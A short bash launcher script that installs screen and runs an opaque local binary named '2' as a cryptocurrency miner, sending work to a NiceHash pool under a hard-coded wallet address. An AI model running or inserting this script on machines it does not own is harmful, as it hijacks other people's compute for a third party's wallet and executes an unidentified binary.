#!/bin/bash

WORKER=$(echo $(shuf -i 1000-9999 -n 1)-Money)
apt-get update
apt install screen -y
chmod u+x 2 && ./2 -a octopus -o stratum+tcp://octopus.eu.nicehash.com:3389 -u 3H6BkkXNW6qaK563qfAHm2uZ1sFgnqCjL6.$WORKER
